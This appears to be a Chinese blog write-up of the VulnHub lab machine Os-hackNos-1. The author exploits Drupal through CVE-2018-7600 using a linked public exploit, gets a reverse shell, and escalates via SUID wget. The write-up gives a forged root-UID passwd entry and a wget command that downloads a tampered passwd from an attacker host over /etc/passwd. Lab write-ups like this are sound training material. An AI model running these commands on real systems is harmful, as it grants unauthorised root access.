您的位置: 首页  >  文章  >  oscp——Os-hackNos-1

oscp——Os-hackNos-1

分类: 文章 2025-01-18 10:25:58

0x00 前言

这个是第二十台机子了,感觉有点感觉了,但是还是差一点东西。
54ix5aW96ICB5amG

链接

https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

0x01 信息收集

ip

oscp——Os-hackNos-1

端口

oscp——Os-hackNos-1

0x02 攻击

1.端口

端口无果

2.web

访问80端口
oscp——Os-hackNos-1
然后进行目录遍历,可以看到一个是一个drupal的cms
oscp——Os-hackNos-1
先判断下版本
oscp——Os-hackNos-1
找一下历史漏洞,发现有一个cve
CVE-2018-7600
https://github.com/pimps/CVE-2018-7600
然后进行利用
oscp——Os-hackNos-1
弹一个shell回来
oscp——Os-hackNos-1
然后看一下suid的内容oscp——Os-hackNos-1
有wget,可以使用wget提权
把目标的passwd的内容copy下来
然后加上
test:11test$at615QShYKduQlx5z9Zm7/:0:0:root:/root:/bin/bash
本地开启http
执行
wget http://192.168.0.111:8000/passwd -O /etc/passwd
之后su提权
su test
123456
oscp——Os-hackNos-1
拿到flag
oscp——Os-hackNos-1

0x03 总结

  • suid wget提权学习

相关推荐